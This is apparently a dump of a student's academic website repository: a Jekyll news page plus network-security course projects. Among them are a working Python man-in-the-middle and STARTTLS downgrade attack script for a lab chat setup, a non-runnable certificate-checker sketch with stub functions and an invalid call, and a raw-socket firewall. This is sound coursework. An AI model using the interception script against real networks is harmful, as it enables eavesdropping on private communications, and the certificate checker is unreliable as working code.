README.md
## Visit the website @ [shresthakamal.github.io/home](https://shresthakamal.github.io/home/).




_pages/news.md
---
layout: page
permalink: /news/
title: News
description:
nav: false
nav_order: 3
---
 
  <div class="news">
    {% if site.news != blank -%} 
    {%- assign news_size = site.news | size -%}
    <div class="table-responsive" {% if site.news_scrollable and news_size > 3 %}style="max-height: 2000vw"{% endif %}>
      <table class="table table-sm table-borderless">
      {%- assign news = site.news | reverse -%}
      {% if site.news_limit %}
      {% assign news_limit = site.news_limit %}
      {% else %}
      {% assign news_limit = news_size %}
      {% endif %}
      {% for item in news limit: 1000 %} 
        <tr>
          <th scope="row" style="width:15%">{{ item.date | date: "%b %-d, %Y" }}</th>
          <td style="text-align:justify">
            {% if item.inline -%} 
              {{ item.content | remove: '<p>' | remove: '</p>' | emojify }}
            {%- else -%} 
              <a class="news-title" href="{{ item.url | relative_url }}">{{ item.title }}</a>
            {%- endif %} 
          </td>
        </tr>
      {%- endfor %} 
      </table>
    </div>
  {%- else -%} 
    <p>No news so far...</p>
  {%- endif %} 
  </div>


assets/files/iith/projects/securechat/A2.py
import ssl, sys, socket, time, os

TIME_DELAY = 2


class bcol:
    SERVER_col = "\033[95m"  # LightMagenta
    CLIENT_col = "\033[94m"  # LightYellow
    OKBLUE = "\033[94m"
    OKCYAN = "\033[96m"
    OKGREEN = "\033[92m"
    FAIL = "\033[91m"  # LigntRed
    ENDC = "\033[0m"
    BOLD = "\033[1m"
    UNDERLINE = "\033[4m"


def create_socket() -> socket:
    """Creating SOCK_STREAM Sockets

    Returns:
        socket: Returns sockets
    """
    return socket.socket(socket.AF_INET, socket.SOCK_STREAM)


def clean() -> None:
    """Clean the Terminal"""
    os.system("cls" if os.name == "nt" else "clear")


def fake_connection(server: str, PORT: int = 8096, run_dns: bool = False):
    """Function to generate fake connection with trudy in middle of alice and bob

    Args:
        server (str): Server
        PORT (int, optional): Connection Port. Defaults to 8096.
        run_dns (bool, optional): Falg to enable DNS resolution. Defaults to False.

    Raises:
        Exception: DNS Name Resolution Error

    Returns:
        _type_: sockets for fake connection
    """

    # Unpoisioned State
    # Alice(NR = 172.31.0.2)<========> Bob (NR = 171.31.0.3)

    # Poisioned State
    # Alice(NR = 172.31.0.4)<======> FakeBob(172.31.0.4) | FakeAlice (172.31.0.3) <========> Bob (171.31.0.4)

    # Creating a Fake Bob for Alice to Connect To
    fake_bob = create_socket()
    fake_bob.bind(("", PORT))
    fake_bob.listen(1)
    print(bcol.OKCYAN + "\n[INFO]: Fake Bob Up ... " + bcol.ENDC)
    print(bcol.OKCYAN + "[INFO]: Listening to Clients ... \n" + bcol.ENDC)

    # This socket is accepted by the Fake Bob = Trudy
    # So the name resolution for Alice should be poisioned to 172.31.0.4(TRUDY)
    # and not 172.31.0.3 (BOB) for attack
    true_alice, clientIP = fake_bob.accept()
    # clientIP => IP of Alice connected to Trudy (Fake Bob)
    print(f"{bcol.BOLD}[INFO]: Connection request from {clientIP[0]} to '{server}'{bcol.ENDC}")
    print(f"{bcol.BOLD}[SUCCESS]: Client, {clientIP[0]} accepted.{bcol.ENDC} \n")

    # Creating Fake Alice for Bob to connect to
    fake_alice = create_socket()

    # Fake Alice should connect to Bob so plain simple Name Resolution
    if run_dns:
        try:
            serverIP = socket.gethostbyname(server)
        except socket.gaierror:
            raise Exception("[ERROR]: Name Resolution Failed !!")
    else:
        serverIP = "172.31.0.3"

    # Connecting Fake Alice to Bob (172.31.0.3)
    fake_alice.connect((serverIP, PORT))
    print(f"{bcol.OKCYAN}[INFO]: Forwarding Connection Request to:'{server}: {serverIP}'{bcol.ENDC}")
    print(f"{bcol.BOLD}[SUCCESS]: Connection established,{bcol.ENDC} {server}: {serverIP}\n")

    # Clean Up
    fake_bob.close()
    time.sleep(TIME_DELAY + 1)
    clean()
    return true_alice, fake_alice


def downgrade(client: str, server: str, PORT: int, DATA_BUFFER: int = 1024):
    """Downgrade Attack

    Args:
        client (str): Client Name
        server (str): Server Name
        PORT (int): Connecting Port
        DATA_BUFFER (int, optional): Memory Buffer for messages sent. Defaults to 1024.
    """

    # Create Fake connection for Alice and Bob
    true_alice, fake_alice = fake_connection(server, PORT=PORT)

    print(f"[SUCCESS]:{bcol.OKCYAN} {client}<=====> TRUDY <======>{server}\n")
    print(f"[SUCCESS]:{bcol.OKGREEN}Two-way TCP Communication Established.{bcol.ENDC}")

    while True:
        # Half Duplex Communication so, Chat Starts at the client side
        # Fake Bob is waiting to receive from true alice

        data = true_alice.recv(DATA_BUFFER)
        print(f"\n{bcol.OKBLUE}{client}{bcol.ENDC}: {data.decode()}")

        # If True Alice sends "chat_close"
        if data.decode() == "chat_close":
            print(f"{bcol.FAIL}[INFO]: Chat Close request by {client}.{bcol.ENDC}")
            print(f"{bcol.FAIL}[INFO]: Leaving the communication in 2 sec...{bcol.ENDC}")
            fake_alice.sendall(data)
            time.sleep(TIME_DELAY + 1)
            break

        # The downgrade attack is to prevent a TLS communication between true alice and true bob
        # So, if True Alice requests a TLS communication (Encryption) Channel
        # Prevent the encryption by sending "chat_STARTTLS_NOT_SUPPORTED"
        if data.decode() == "chat_STARTTLS":
            print(f"\n{bcol.OKCYAN}Encryption Requested by: {client}{bcol.ENDC}")
            print(f"{bcol.OKCYAN}Performing Downgrade attack on {client} and {server}{bcol.ENDC}")
            true_alice.sendall("chat_STARTTLS_NOT_SUPPORTED".encode())
            print(f"[INFO]: {bcol.FAIL}Initiating Downgrade attack with '{client}' and '{server}'{bcol.ENDC}")

            time.sleep(TIME_DELAY)
            clean()

            print(f"[SUCCESS]:{bcol.OKGREEN} Two-way TCP Communication Established.{bcol.ENDC}")
            print(f"{bcol.BOLD}>>> Downgrade Attack Successful <<<{bcol.ENDC}\n")

        else:
            # Transmitting the received message to True Bob
            fake_alice.sendall(data)

            # Capturing the messages from true bob
            data = fake_alice.recv(DATA_BUFFER)
            print(f"\n{bcol.OKBLUE}{server}{bcol.ENDC}: {data.decode()}")

            # Transmitting all the messages from True bob to True Alice
            true_alice.sendall(data)

            if data.decode() == "chat_close":
                print(f"\n{bcol.FAIL}[INFO]: Chat Close request by {server}.{bcol.ENDC}")
                print(f"{bcol.FAIL}[INFO]: Leaving the communication in 2 sec...{bcol.ENDC}\n")
                time.sleep(TIME_DELAY)
                break

    # closing the connections
    true_alice.close()
    fake_alice.close()


def get_context(certificate: str, private_key: str, root: str = "/usr/local/share/ca-certificates/root.crt"):
    """Function to return the context from certificate verification from OpenSSL

    Args:
        certificate (str): Certificate of the client
        private_key (str): Private key of the client
        root (str, optional): Location to the root certificate. Defaults to "/usr/local/share/ca-certificates/root.crt".

    Returns:
        SSLContext: Returns an OpenSSL context
    """
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    context.load_verify_locations(root)
    context.load_cert_chain(certificate, private_key)
    context.verify_mode = ssl.CERT_REQUIRED
    context.check_hostname = False
    return context


def mitm(client: str, server: str, PORT: int, DATA_BUFFER: int = 1024):
    """Function to initiate Man in the Middle attack

    Args:
        client (str): Client Name
        server (str): Server Name
        PORT (int): Connecting Port
        DATA_BUFFER (int, optional): Memory buffer for messages. Defaults to 1024.
    """

    true_alice, fake_alice = fake_connection(server, PORT=PORT)

    # Now Trudy is listening to all the communication between Alice(client) and Bob (server)
    # Half Duplex Communication, So Alice starts the chat
    print(f"[SUCCESS]:{bcol.OKCYAN} {client}<=====> TRUDY <======>{server}\n")
    print(f"[SUCCESS]:{bcol.OKGREEN}Two-way TCP Communication Established.{bcol.ENDC}")

    while True:
        # In half duplex, Client(Alice) will be the first one sending the message
        # So Trudy is receiving from alice and sending it to bob
        data = true_alice.recv(DATA_BUFFER)
        print(f"\n{bcol.OKBLUE}{client}{bcol.ENDC}: {data.decode()}")
        fake_alice.sendall(data)

        # If alice invokes "chat_close", the communication ins exited
        if data.decode() == "chat_close":
            print(f"{bcol.FAIL}[INFO]: Chat Close request by {client}.{bcol.ENDC}")
            print(f"{bcol.FAIL}[INFO]: Leaving the communication in 2 sec...{bcol.ENDC}")
            time.sleep(TIME_DELAY + 1)
            break

        # Now after Alice has sent her message, Trudy is listening for Bob's message and sending it to alice
        # Listening to Bob to send a message and forwarding it to alice
        data = fake_alice.recv(DATA_BUFFER)
        print(f"\n{bcol.OKBLUE}{server}{bcol.ENDC}: {data.decode()}")
        true_alice.sendall(data)

        # If bob invokes "chat_close", the communication ins exited
        if data.decode() == "chat_close":
            print(f"\n{bcol.FAIL}[INFO]: Chat Close request by {server}.{bcol.ENDC}")
            print(f"{bcol.FAIL}[INFO]: Leaving the communication in 2 sec...{bcol.ENDC}\n")
            time.sleep(TIME_DELAY)
            break

        # Now, if bob sends "chat_STARTTLS_ACK" means client has request a TLS Encrypted Channel
        # Now, Trudy will perform a mitm attack
        # She will create a two way encrypted channel between alice and bob
        if data.decode() == "chat_STARTTLS_ACK":
            print(f"\n[INFO]: Encryption requested by {client}")
            print(f"[INFO]: {bcol.FAIL}Initiating MITM attack with '{client}' and '{server}'{bcol.ENDC}")
            time.sleep(TIME_DELAY + 1)

            clean()

            # Two Way TLS Encryption enabled.
            # Start TLS Procedure with proided certficates with FAKE ALICE
            fake_alice_context = get_context(certificate="Trudy/Fake_Alice/fake_alice.crt", private_key="Trudy/Fake_Alice/fake_alice_key.pem")
            fake_alice = fake_alice_context.wrap_socket(fake_alice, server_hostname=server, do_handshake_on_connect=True)

            # Start TLS Procedure with proided certficates with FAKE BOB
            context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
            context.load_verify_locations("/usr/local/share/ca-certificates/root.crt")
            context.load_cert_chain("Trudy/Fake_Bob/fake_bob.crt", "Trudy/Fake_Bob/fake_bob_key.pem")
            context.verify_mode = ssl.CERT_REQUIRED
            context.check_hostname = False
            true_alice = context.wrap_socket(true_alice, server_side=True, do_handshake_on_connect=True)

            print(f"\n{bcol.OKGREEN}[SUCCESS]: Encrypted Communication established with {client}{bcol.ENDC}")
            time.sleep(TIME_DELAY)
            print(f"{bcol.OKGREEN}[SUCCESS]: Encrypted Communication established with {server}{bcol.ENDC}\n")

            print(f"{bcol.BOLD}>>> Man in the Middle Attack Successful <<<{bcol.ENDC}")

    # Cleaning and CLosing Connections
    true_alice.close()
    fake_alice.close()


if __name__ == "__main__":

    # Taking Command line arguments
    if sys.argv[1] == "-d":
        downgrade(client=sys.argv[2], server=sys.argv[3], PORT=int(sys.argv[4]))
    if sys.argv[1] == "-m":
        mitm(sys.argv[2], sys.argv[3], PORT=int(sys.argv[4]))


assets/files/iith/projects/pki/certificate_checker.py
def parse_certificate(certificate, **kwargs):
    """
    Contains the entire certificate in JSON
    """


def get_key_from_store(name_of_CA):
    """
    Returns Public key based on the name of Certificate Authority
    """


def parse_key(key):
    """
    Parses p,q,n,e,d based on the values of key
    """


def query_CRL(URL, SN):
    """
    Returns the revocation status by looking at the CRL list
    """


def query_OCSP(URL, SN):
    """
    Returns the revocation status by querying the OCSP Server
    """


def myCertChecker(digital_certificate, today, domain_name):
    """
    Function to check the validity of the digital certificate

    1. Integrity Check: Verification of the Signature
    2. Validity of the Certificate
    3. Revocation Status Check
    4. Verification of Common Name and Subject's Alternative Name
    """

    """Generate message digest using tbs"""

    # Get the tbsCertificate from the digital_certificate
    tbsCertificate = parse_certificate(digital_certificate, tbs=True)

    # Get the Signature Hash and Signing Algorithm
    hash, encryption = parse_certificate(digital_certificate, sign_algorithm=True)

    # Use the information of hash and tbs to get the message digest
    message_digest_from_tbs = hash(tbsCertificate)

    """Generate Message Digest from Signature Value"""

    # Get Signature Value from digital_certificate
    sign_value = parse_certificate(digital_certificate, sign=True)

    # Get the public key of the Certificate Authority from root stores
    pub_key = get_key_from_store(parse_certificate(digital_certificate, name_CA=True))

    # Parse the values of (n,e) from public key
    n, e = parse_key(pub_key)

    # Generate the message digest using the signatue value from certificate
    message_digest_from_sign = (sign_value**e) % n

    """ Verify the integrity of the certificate: No Certificate Tampering"""
    if message_digest_from_tbs == message_digest_from_sign:

        valid_from, valid_to = parse_certificate(digital_certificate, validity=True)

        """ Checking the Validity of the certificate"""
        if valid_from < today and valid_to >= today:

            serial_no = parse_certificate(digital_certificate, sn=True)

            # Querying CRL Distribution Points to check the revocation status
            crl_path = parse_certificate(digital_certificate, crl_path=True)
            CRL_revocation_status = query_CRL(crl_path, serial_no)

            # Querying OCSP Server to check the revocation status
            ocsp_server = parse_certificate(digital_certificate, ocsp_server=True)
            OCSP_revocation_status = query_OCSP(ocsp_server, serial_no)

            """ Checking the Revocation Status"""
            if CRL_revocation_status and OCSP_revocation_status:
                cn, sans = parse_certificate(digital_certificate, cn_sans=True)

                """Verification of Common Name and Subject's ALternative Name"""
                if domain_name == cn or domain_name in sans:

                    # Certificate is VAID
                    return True
            else:
                # Certificate has been revoked.
                return False
        else:
            # Certificate has expired.
            return False
    else:
        # Certificate has been compromised.
        return False


# MAIN FUNCTION

myCertChecker(_.wikipedia.org, "2022-01-30 06:42:55.581381", "en.wikipedia.org")


assets/files/iith/projects/firewall/firewall.py
from struct import *
import socket, struct, time, os, binascii
import click, select, json
import matplotlib.pyplot as plt
from getkey import getkey

MEMORY_BUFFER = 60000


class bcol:
    SERVER_col = "\033[95m"  # LightMagenta
    CLIENT_col = "\033[94m"  # LightYellow
    OKBLUE = "\033[94m"
    OKCYAN = "\033[96m"
    OKGREEN = "\033[92m"
    FAIL = "\033[91m"  # LigntRed
    ENDC = "\033[0m"
    BOLD = "\033[1m"
    UNDERLINE = "\033[4m"


def clean() -> None:
    os.system("cls" if os.name == "nt" else "clear")


class BasicFirewall:
    def __init__(self, interface1, interface2):
        self.internal_socket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
        self.external_socket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))

        self.internal_socket.bind((interface1, 0))
        self.external_socket.bind((interface2, 0))

        self.internal_host_mac = "52:54:00:f7:69:35"
        self.external_host_mac = "52:54:00:d6:10:87"

        self.rules = {"BLOCKED_IP_LIST": ["142.250.182.14"]}

    def get_ip(self, addr):
        return ".".join(map(str, addr))

    def parse_ethernet(self, raw_data):
        dest_bytes, src_bytes, prototype = struct.unpack("!6s6sH", raw_data[:14])
        destin_mac_addr = ":".join("%02x" % b for b in dest_bytes)
        src_mac_addr = ":".join("%02x" % b for b in src_bytes)
        prototype_field = socket.htons(prototype)
        return destin_mac_addr, src_mac_addr, prototype_field

    def parse_IP(self, raw_data):
        version_header_length = raw_data[0]
        version = version_header_length >> 4
        header_length = (version_header_length & 15) * 4
        ttl, proto, src, target = struct.unpack("! 8x B B 2x 4s 4s", raw_data[:20])
        data = raw_data[header_length:]
        src = self.get_ip(src)
        target = self.get_ip(target)
        return version, header_length, ttl, proto, src, target, data

    def parse_rules(self, raw_data):
        eth = self.parse_ethernet(raw_data)
        ip = self.parse_IP(raw_data[14:])

        if eth[1] == self.external_host_mac:
            # ip[4] == Source IPV4 Address
            if ip[4] in self.rules["BLOCKED_IP_LIST"]:
                allow = False
            else:
                allow = True
                dest_mac, src_mac, type_mac = struct.unpack("! 6s 6s H", raw_data[:14])
                dest_mac = binascii.unhexlify(self.internal_host_mac.replace(":", ""))
                new_data = struct.pack("! 6s 6s H", dest_mac, src_mac, type_mac) + raw_data[14:]
                self.internal_socket.sendall(new_data)
        elif eth[1] == self.internal_host_mac:
            allow = True
            dest_mac, src_mac, type_mac = struct.unpack("! 6s 6s H", raw_data[:14])
            dest_mac = binascii.unhexlify(self.external_host_mac.replace(":", ""))
            new_data = struct.pack("! 6s 6s H", dest_mac, src_mac, type_mac) + raw_data[14:]
            self.external_socket.sendall(new_data)
        else:
            allow = True

        return allow, ip[4], ip[5]

    def run(self):
        while True:
            interface_sockets, _, _ = select.select([self.internal_socket, self.external_socket], [], [])

            for individual_socket in interface_sockets:
                raw_data, _ = individual_socket.recvfrom(MEMORY_BUFFER)
                ret, sip, dip = self.parse_rules(raw_data)
                if ret:
                    print(f"Src IP: {sip}\t        Dst IP: {dip}\t\t          {bcol.OKGREEN}Allowed{bcol.ENDC}")
                else:
                    print(f"Src IP: {sip}\t        Dst IP: {dip}\t\t          {bcol.FAIL}Dropped{bcol.ENDC}")


class AdvanceFirewall:
    def __init__(self, interface1, interface2, dos_threshold: int = 100, mapper_file: str = "mapper.json"):
        """Advanced Firewall Class

        Args:
            interface1 (Socket): Interface that is connected in to one subnet
            interface2 (Socket): Interface that is connected to next subnet
            dos_threshold (int, optional): Number of packets before firewall detects DDoS. Defaults to 0.
            mapper_file (str, optional): File that accumulates all the informations from raw sockets. Defaults to "mapper.json".
        """

        self.internal_socket, self.external_socket = self.initialize_socket(interface1, interface2)

        self.rules_set = {}
        self.mapping_dict = self.load_mapper(mapper_file)
        self.packet = ""
        self.time_stamp = []

        self.dos_threshold = dos_threshold
        self.sources_ipv4 = {}

        self.mean_time = 0.0
        self.plot_allow, self.plot_discard = [], []
        self.allowed, self.discarded = 0, 0

    def load_mapper(self, mapper_file: str):
        """File to load the elements to capture from the raw sockets

        Args:
            mapper_file (str, optional): File that accumulates all the informations from raw sockets. Defaults to "mapper.json".

        Returns:
            _type_: dictionary
        """
        with open(mapper_file, "r") as handler:
            mapper = json.load(handler)
        return mapper

    def initialize_socket(self, interface1, interface2):
        """Function to initialize the sockets

        Args:
            interface1 (Socket): First Network
            interface2 (Socket): Next Network

        Returns:
            socket, socket: Binded Sockets for both the networks
        """

        internal_socket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x003))
        external_socket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))

        internal_socket.bind((interface1, 0))
        external_socket.bind((interface2, 0))

        return internal_socket, external_socket

    def parse_L2(self, raw_data: str, byte_len: int = 14):
        """Parsing the information of the L2 Layers

        Args:
            raw_data (str): Taking the raw data from the socket
            byte_len (int, optional): Number of bytes for L2 Layer. Defaults to 14.
        """

        self.packet = f"{bcol.OKBLUE}[Ethernet]{bcol.ENDC}"

        destination, source, prototype = struct.unpack("!6s6sH", raw_data[:byte_len])

        packet_destination_mac = ":".join("%02x" % m for m in destination)
        self.mapping_dict["dstn_mac"] = packet_destination_mac

        packet_source_mac = ":".join("%02x" % s for s in source)
        self.mapping_dict["src_mac"] = packet_source_mac

        ethprotocol = socket.htons(prototype)

        self.mapping_dict["etherprotocol"] = ethprotocol
        if ethprotocol == socket.ntohs(0x0800):
            self.parse_IP_headers(raw_data[14:])

    def parse_L3(self, raw_data: str):
        """Parse L3 Packets

        Args:
            raw_data (str): Raw packets from the socket
        """

        self.packet += f"{bcol.OKBLUE}[IPv4]{bcol.ENDC}"

        iph = unpack("!BBHHHBBH4s4s", raw_data[:20])
        self.mapping_dict["ttl"] = iph[5]

        version_len = iph[0]

        ihl = version_len & 0xF
        ip_header_length = ihl * 4
        self.mapping_dict["header_len"] = ip_header_length

        ipv4protocol = iph[6]
        self.mapping_dict["ipv4protocol"] = ipv4protocol

        source_addr = socket.inet_ntoa(iph[8])
        self.mapping_dict["src_ip"] = source_addr

        dest_addr = socket.inet_ntoa(iph[9])
        self.mapping_dict["dstn_ip"] = dest_addr

        if ipv4protocol == 1:
            self.parse_L3_ICMP(raw_data[ip_header_length:])

        elif ipv4protocol == 6:
            self.parse_L3_TCP(raw_data[ip_header_length:])

        elif ipv4protocol == 17:
            self.parse_L3_UDP(raw_data[ip_header_length:])

    def parseIPv6Head(self, raw_data):
        """Parse IPV4 Packets from raw socket packets

        Args:
            raw_data (str): Packets from Raw Sockets
        """
        self.packet += f"{bcol.OKBLUE}[IPv6]{bcol.ENDC}"
        iph = struct.unpack("!HHHHHH16s16s", raw_data[:20])

        header_len = iph[7]
        self.mapping_dict["ipv4_header_len"] = header_len

        ipv6protocol = iph[8]
        self.mapping_dict["ipv6protocol"] = ipv6protocol

        v6source_addr = ":".join("%0x{0:X2}" % b for b in iph[9])
        self.mapping_dict["v6source_addr"] = v6source_addr

        v6dest_addr = ":".join("%0x{0:X2}" % b for b in iph[10])
        self.mapping_dict["v6dest_addr"] = v6dest_addr

        if ipv6protocol == 1:
            self.parseICMPv6Head(raw_data[header_len:])

        elif ipv6protocol == 6:
            self.parse_L3_TCP(raw_data[header_len:])

        elif ipv6protocol == 17:
            self.parse_L3_UDP(raw_data[header_len:])

    def parse_IP_headers(self, raw_data: str):
        """Parsing IP headers based on version

        Args:
            raw_data (str): Raw Packet Data
        """
        version_len = raw_data[0]

        version = version_len >> 4

        if version == 4:
            self.parse_L3(raw_data)
        else:
            self.parseIPv6Head(raw_data)

    def parse_L3_ICMP(self, raw_data):
        self.packet += f"{bcol.OKBLUE}[ICMPv4]{bcol.ENDC}"

        typ, code, _, _, _ = struct.unpack("!bbHHh", raw_data[:8])
        self.mapping_dict["icmp4type"] = typ
        self.mapping_dict["icmp4code"] = code

    def parseICMPv6Head(self, raw_data: str):
        """Parsing ICMP V6 Packets

        Args:
            raw_data (str): Packets from Raw Sockets
        """
        self.packet += f"{bcol.OKBLUE}ICMPv6{bcol.ENDC}"
        typ, code, _ = struct.unpack("!bbH", raw_data[:4])

        self.mapping_dict["icmp6type"] = typ
        self.mapping_dict["icmp6code"] = code

    def parse_L3_TCP(self, raw_data):
        """Parsing TCP packets"""
        self.packet += f"{bcol.OKBLUE}[TCP]{bcol.ENDC}"
        (src_port, dest_port, _, _, offset) = struct.unpack("!HHLLH", raw_data[:14])

        self.mapping_dict["tcpsrc_port"] = src_port
        self.mapping_dict["tcpdest_port"] = dest_port

        ack = (offset & 16) >> 4
        self.mapping_dict["flag_ack"] = ack

        syn = (offset & 2) >> 1
        self.mapping_dict["flag_syn"] = syn

        fin = offset & 1
        self.mapping_dict["flag_fin"] = fin

        #print(ack, syn, fin) # 0, 1, 0

    def parse_L3_UDP(self, raw_data):
        """Parse L3 UDP Headers Packets

        Args:
            raw_data (str): Packets from Raw sockets
        """
        self.packet += f"{bcol.OKBLUE}[UDP]{bcol.ENDC}"

        pack = struct.unpack("!4H", raw_data[:8])
        self.mapping_dict["udpsrc_port"] = pack[0]
        self.mapping_dict["udpdest_port"] = pack[1]

    def manageRules(self):
        """Manage Rules from "rules.json" files"""
        try:
            if os.path.exists("rules.json") == False:
                rules_template = {"L2": [], "L3v4": [], "L3v6": [], "L4TCP": [], "L4UDP": [], "ICMP": []}
                with open("rules.json", "w") as outfile:
                    json.dump(rules_template, outfile)
            os.system("sudo gedit rules.json")

        except KeyboardInterrupt as e:

            self.load_rules()
            clean()
            main()

    def parse_rules(self, raw_data):
        """Parse Packets based on rules

        Args:
            raw_data (str): Raw Packets

        Returns:
            allow/discard: Allow or discard packets
        """

        start = time.process_time()
        self.parse_L2(raw_data)
        allowed = False

        # Current application: Everything is discarded and matched packets are allowed
        acceptance = []
        for layer in self.rules_set.keys():
            for rule in self.rules_set[layer]:
                for identifier in rule.keys():
                    if identifier != "rule_id" and identifier != "rule":
                        print(rule[identifier], self.mapping_dict[identifier])
                        if rule[identifier] == self.mapping_dict[identifier]:
                            acceptance.append(True)
                        else:
                            acceptance.append(False)
                if rule["rule"].lower() == "allow":
                    acceptance.append(True)
                else:
                    acceptance.append(False)
        if all(acceptance) == True:
            allowed = True
        else:
            allowed= False

        # Next application: Everything is allowed and matched packets are discarded

        #         if rule["rule"].lower() == "discard":
        #             acceptance.append(True)
        #         else:
        #             acceptance.append(False)
        # if all(acceptance) == True:
        #     allowed = False
        # else:
        #     allowed= True

        if self.mapping_dict["src_ip"] in self.sources_ipv4:
            self.sources_ipv4[self.mapping_dict["src_ip"]] += 1
        else:
            self.sources_ipv4[self.mapping_dict["src_ip"]] = 0

        if self.sources_ipv4[self.mapping_dict["src_ip"]] > self.dos_threshold:
            print("\u001b[41;1m DoS Detected\u001b[0m")
            allowed = False

        end = time.process_time() - start
        return allowed, end

    def run(self, internal_MAC, external_MAC):
        """Runner to take packets and filter based on rules"""

        clock = time.time()

        while True:
            try:

                all_socks = [self.internal_socket, self.external_socket]
                interface_sockets, _, _ = select.select(all_socks, [], [])

                for individual_socket in interface_sockets:

                    if time.time() - clock >= 1:
                        self.plot_allow.append(self.allowed)
                        self.plot_discard.append(self.discarded)
                        clock = time.time()

                    # Receive data from the raw socket
                    raw_data, _ = individual_socket.recvfrom(MEMORY_BUFFER)

                    status, ppt = self.parse_rules(raw_data)

                    self.time_stamp.append(ppt)

                    if status == True:
                        self.allowed += 1
                        self.discarded += 0

                        if self.mapping_dict["src_mac"] == internal_MAC:

                            dstn_mac, src_mac, type_mac = struct.unpack("! 6s 6s H", raw_data[:14])
                            dstn_mac = binascii.unhexlify(external_MAC.replace(":", ""))
                            new_data = struct.pack("! 6s 6s H", dstn_mac, src_mac, type_mac) + raw_data[14:]
                            self.external_socket.sendall(new_data)

                        elif self.mapping_dict["src_mac"] == external_MAC:

                            dstn_mac, src_mac, type_mac = struct.unpack("! 6s 6s H", raw_data[:14])
                            dstn_mac = binascii.unhexlify(internal_MAC.replace(":", ""))
                            new_data = struct.pack("! 6s 6s H", dstn_mac, src_mac, type_mac) + raw_data[14:]
                            self.internal_socket.sendall(new_data)
                        print(
                            f"""{self.packet} \n"""
                            f"""[Src MAC]: {bcol.BOLD}{self.mapping_dict["src_mac"]}{bcol.ENDC}, [Dstn MAC]: {bcol.BOLD}{self.mapping_dict["dstn_mac"]}{bcol.ENDC} \n"""
                            f"""[Src IP]: {bcol.BOLD}{self.mapping_dict["src_ip"]}{bcol.ENDC}, [Dstn IP]: {bcol.BOLD}{self.mapping_dict["dstn_ip"]}{bcol.ENDC} \n"""
                            f"""[Src Port]: {bcol.BOLD}{self.mapping_dict["tcpsrc_port"]}{bcol.ENDC}, [Dstn Port]: {bcol.BOLD}{self.mapping_dict["tcpdest_port"]}{bcol.ENDC} \n"""
                            f"""[Status]: \u001b[42;1mAllowed\u001b[0m \n"""
                            f"""[PPT] : {round(ppt, 8)}\n\n"""
                        )

                    else:
                        self.allowed += 0
                        self.discarded += 1
                        print(
                            f"""{self.packet}\n"""
                            f"""[Src MAC]: {bcol.BOLD}{self.mapping_dict["src_mac"]}{bcol.ENDC}, [Dstn MAC]: {bcol.BOLD}{self.mapping_dict["dstn_mac"]}{bcol.ENDC} \n"""
                            f"""[SrcIP]: {bcol.BOLD}{self.mapping_dict["src_ip"]}{bcol.ENDC}, [Dstn IP]: {bcol.BOLD}{self.mapping_dict["dstn_ip"]}{bcol.ENDC} \n"""
                            f"""[Src Port]: {bcol.BOLD}{self.mapping_dict["tcpsrc_port"]}{bcol.ENDC}, [Dstn Port]: {bcol.BOLD}{self.mapping_dict["tcpdest_port"]}{bcol.ENDC} \n"""
                            f"""[Status]: {bcol.FAIL}{"Dropped"}{bcol.ENDC} \n"""
                            f"""[PPT] : {round(ppt, 8)}\n\n"""
                        )

            except KeyboardInterrupt as e:
                clean()
                self.analyse_capture()
                i = True
                print("Press 'c' to continue...")

                while i:
                    key = getkey()
                    if key == "c":
                        i = False
                main()

    def analyse_capture(self):
        """Analyse the packet capture"""

        self.mean_time = sum(self.time_stamp) / len(self.time_stamp)
        print("Firewall Capture Statistics\n")

        print(f"No of packets allowed : {self.allowed} \n")
        print(f"No of packets dropped : {self.discarded} \n")
        print(f"Mean Packet Processing Time : {round(self.mean_time, 8)} \n")

        print(f"No of rules in system : {sum(len(v) for v in self.rules_set.values())}")

        plt.title("Firewall Statistics")

        plt.plot(range(len(self.plot_allow)), self.plot_allow, label="Allowed pkts")
        plt.plot(range(len(self.plot_discard)), self.plot_discard, label="Dropped Pkts")

        plt.xlabel("Running Time")
        plt.ylabel("Number of allowed/dropped packets")
        plt.grid()
        plt.legend(["Allowed Packets", "Dropped Packets"])
        plt.savefig("firewall_statistics.png")

    def load_rules(self):
        with open("rules.json", "r") as infile:
            self.rules_set = json.load(infile)

    def set_dos_threshold(self, dos_threshold):
        self.check_dos = True
        self.dos_threshold = dos_threshold


@click.command()
@click.option("-d", help="DDos Attack Detection", default=100)
@click.option("-s", help="Simple Firewall", default=False, is_flag=True)
def main(d: int, s: bool):
    """Main Runner to the Program

    Args:
        d (int): DDos Threshoold
        s (bool): Flag to activate Simple Firewall
    """
    interface1 = "enp1s0"
    interface2 = "enp6s0"

    # Simple Firewall
    if s:
        simple_firewall = BasicFirewall(interface1, interface2)
        simple_firewall.run()
    else:

        firewall = AdvanceFirewall(interface1, interface2, d)
        clean()
        while True:

            print("\nStart Firewall with 's', Manage Rules with 'r', Exit with 'e' \n\n")
            key = getkey()

            # Advanced Firewall
            if key == "s":
                try:
                    firewall.load_rules()
                except FileNotFoundError:
                    pass
                clean()
                firewall.run(internal_MAC="52:54:00:f7:69:35", external_MAC="52:54:00:d6:10:87")

            # Manage Rules
            if key == "r":
                try:
                    firewall.load_rules()
                except FileNotFoundError:
                    pass
                firewall.manageRules()

            if key == "e":
                clean()
                exit(0)


if __name__ == "__main__":
    main()
